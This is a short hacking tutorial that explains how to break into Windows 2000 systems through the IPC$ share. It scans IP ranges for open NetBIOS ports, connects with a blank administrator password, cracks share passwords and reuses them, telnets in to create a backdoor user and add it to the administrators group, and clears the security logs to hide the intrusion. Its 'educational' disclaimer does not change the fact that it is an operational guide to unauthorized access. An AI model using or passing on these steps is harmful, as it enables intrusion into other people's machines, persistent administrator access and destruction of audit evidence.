Introduction: Hacking a Windows 2000 System Through IPC$
This Instructable about hacking is just for educational purposes (or good) not for malicious deeds. It's not advisable to do or perform this Instructable. It could be dangerous. Again, this is just for educational.
Before starting, you need to be running a Win2k system:
Superscan version 3.00 by Foundstone (246kb)
Homepage NetBrute Scanner 18.104.22.168 (247KB)
Homepage PQWak V1.0 (24KB)
Step 1: Scanning for Open Win2k Systems
1. Open SuperScan 2.05 (Port scanner)
2. Select a IP range
3. Check "Only scan responsive pings" and "All selected ports in list"
4. Only scan ports 139 (NetBIOS), and 1025 (Network Blackjack)
5. When a system with both Netbios and BlackJack is found, open NetBrute, and scan that IP to see if there is an IPC$
Step 2: Connecting to the IPC$
1. Open a DOS window
2. Type in " net use \\ipaddress\ipc$ "" /user:administrator "
3. If you connect to the system, it will say, " The command was completed successfully "
4. If it says, bad username or password, Try running PQWak.exe to crack the share name password. Then insert the password like so:
net use \\ipaddress\ipc$ "password" /user:administrator
5. Users usually have only one password for everything. So try the c$ share pass as the administrator password to connect to the IPC$.
Step 3: Connecting Using Computer Management
1. Open Computer Management.
2. Click Action, then Connect to Another Computer
3. Type in the IP address.
Step 4: Creating User Accounts and Adding Them to a Group
1. Open a dos window, and type the following: telnet IPaddress
2. If prompted to type a username and password, type Administrator with no password.
3. To create a user account, type the following: Net user username password /add
4. Replace Username and password with whatever you like.
5. To add a user account to a domain, type the following: Net localgroup administrators username /add Or Net group administrators username /address.
Step 5: Covering Your Tracks
1. Open a dos window, and type the following: Net use \\ipaddress\ipc$ /delete
2. While logged on to Computer Management. Check if the Security Logs are being audited in Event Viewer. If they are, clear them.